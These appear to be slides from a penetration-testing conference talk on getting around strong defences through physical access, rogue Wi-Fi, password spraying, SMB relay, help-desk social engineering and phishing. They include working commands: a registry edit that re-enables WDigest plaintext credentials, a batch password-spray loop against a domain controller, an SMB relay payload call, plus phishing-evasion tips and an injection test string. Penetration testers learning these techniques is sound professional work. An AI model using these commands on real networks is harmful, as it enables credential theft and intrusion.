Stupid Pentester Tricks

AKA Tantric Pentesting

by Laurent Desaulniers



  • Pentester

  • Magician

  • Nsec Challenge Designer

  • Lockpicker

  • Security Amateur


If it is stupid and it works, then it is not stupid *


Client has:
  • EMET/SRP/LAPS everywhere

  • Patches everywhere

  • 24/7 surveillance

  • Medeco

  • NAC

  • 15 character minimum password policy

  • No Nebtios/LLMNR/Responder <3


table flip

Physical Pentest is hard

Repeat after me: I AM NOT JAMES BOND

  • ProxMark/RavenHid is conspicuous

  • Key Impressioning is hard

  • Lockpicking can be hard, under pressure

Physical is hard

key mold

Physical Pentest

  • Always keep spare keys for switching

Physical Pentest


Demo 1

Universal Door Controller *

1 Pending approval from the demo gods

Universal door controller

universal door

Conspicuous Proxmark?


Access card

hack selfie2

Hackers take selfies too…​


Hackers take selfie too…​

Wifi is hard

Client has EAP, well configured clients, and only accepts valid certificates

table flip 2


Simple access point + captive portal

DO NOT use an already existing SSID

Create your own.

→ Bypasses most WIPS solutions.

Hacking is hard

With most organisations, you can still win using:

  • Responder

  • GPP

  • Mimikatz

Hacking is hard

But what happens when all of these are blocked

table flip 3

Mimikatz blocked

If you can run Mimikatz, you are admin.

You can disable the anti-Mimikatz!

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
 /v UseLogonCredential /t REG_DWORD /d 1


Powerspraying is a very effective technique

Try 1 password for all accounts

  • Soleil01 (Quebec)

  • CompanyName2016

  • Welcome1

Passwords guaranteed


No powershell? No problem!

@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) \
DO @net use DOMAINCONTROLLERIPC$ /user:DOMAIN%n %p 1>NUL 2>&1 \
&& @echo [*] %n:%p && @net use /delete DOMAINCONTROLLERIPC$ > NUL

SMB Relay

20 character password policy? No problem!

SMB Relay is very hard to protect against.

Nessus classifies the finding as low

./ -h [My_IP] -e [My_EVIL_EXE]

Nothing works? Call support

If you can get tech support to connect to you, you won!

  • My favourites are:

  • "My screen’s background is asking me for money"

  • "Why did you install a dancing pig icon telling me to call tech support?"

Nothing works? Call the help desk

You can then:

Freeze The Ram
SMB Relay


Improve your phishing game

Do NOT use security related motives

People are trained to recognized this as phishing.

Cheating at phishing

Test was supposed to be secret…​ But suddenly, everyone knows about it?

Cheating at phishing


Cheating at phishing


Cheating at phishing

I always include a SMB Relay image in all my phish.

Users are told to forward phishing to tech support

Domain selection

Using - instead of . works wonders:

Domain Selection

Always set up valid SPF records.

Helps to prevent being categorized as spam..

Make sure that the website is properly categorized by crawler

HINT Redirect all IPs to the original website, except your target’s.

Key points

I use Phishing Frenzy for all of my phishing needs.

I am told GoPhish is very good as well.

Other tricks

Or '1'='<script>alert(1)>../../../passwd%0a%0d

If the referer is crawled, you know that someone is watching the log.



Thank you